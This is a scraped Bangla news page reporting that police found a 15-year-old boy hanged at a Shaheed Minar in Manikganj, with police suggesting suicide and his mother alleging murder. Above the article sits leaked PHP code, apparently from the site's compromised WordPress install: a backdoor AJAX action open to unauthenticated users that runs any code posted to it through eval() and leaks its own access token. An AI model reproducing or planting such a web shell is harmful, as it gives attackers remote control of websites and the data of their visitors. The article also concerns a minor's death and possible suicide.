// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মানিকগঞ্জে শহীদ মিনারে ঝুলছিল কিশোরের মরদেহ | potrikaybangladesh.com
Thursday, October 1, 2026
Homeঅপরাধমানিকগঞ্জে শহীদ মিনারে ঝুলছিল কিশোরের মরদেহ

মানিকগঞ্জে শহীদ মিনারে ঝুলছিল কিশোরের মরদেহ

মানিকগঞ্জ সদর উপজেলায় একটি শহীদ মিনার থেকে কিশোরের ঝুলন্ত মরদেহ উদ্ধার করেছে পুলিশ।

আজ রোববার সকালে সদর উপজেলার জাগীর এলাকা থেকে মরদেহটি উদ্ধার করা হয়।

সদর থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) মো. মনির হোসেন দ্য ডেইলি স্টারকে এ তথ্য নিশ্চিত করেছেন।

মৃত সিহাব হোসেন (১৫) সদর উপজেলার হিজুলী গ্রামের সেলিম মিয়ার ছেলে। সে মানিকগঞ্জ বাসস্ট্যান্ড এলাকায় মাছ বাজারের এক ব্যবসায়ীর কর্মচারী ছিল।

স্থানীয়দের বরাতে পুলিশ জানায়, গতকাল শনিবার রাত থেকে সিহাব নিখোঁজ ছিল। আজ সকাল ৭টার দিকে সদর উপজেলার জাগীর এলাকায় একটি মাঠের পাশে অবস্থিত শহীদ মিনারে গলায় ফাঁস নেওয়া অবস্থায় ওই কিশোরের মরদেহ দেখেন স্থানীয়রা। খবর পেয়ে পুলিশ ঘটনাস্থল থেকে মরদেহ উদ্ধার করে।

মাছ ব্যবসায়ী মনির হোসেন ডেইলি স্টারকে বলেন, সিহাব আমার দোকানে কাজ করতো। গতকাল সে ছুটি নিয়েছিল, তাই কাজে আসেনি।

সিহাবের মা মুক্তা আক্তার ডেইলি স্টারকে বলেন, ‘এই শোক আমি কীভাবে সইবো। কারা আমার ছেলেকে হত্যা করল? আমি বিচার চাই।’

ওসি মনির হোসেন বলেন, শনিবার নৌকা বাইচ দেখার জন্য সিহাব তার মায়ের কাছে ৫০০ টাকা চেয়েছিল। টাকা না দেওয়া অভিমান থেকে সে আত্মহত্যা করতে পারে।

তিনি বলেন, এ ঘটনায় একটি অপমৃত্যুর মামলা হয়েছে। ময়নাতদন্তের জন্য মরদেহ মানিকগঞ্জ মেডিকেল কলেজ হাসপাতালের মর্গে পাঠানো হয়। তদন্তের পর বিষয়টি আরও নিশ্চিত হওয়া যাবে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments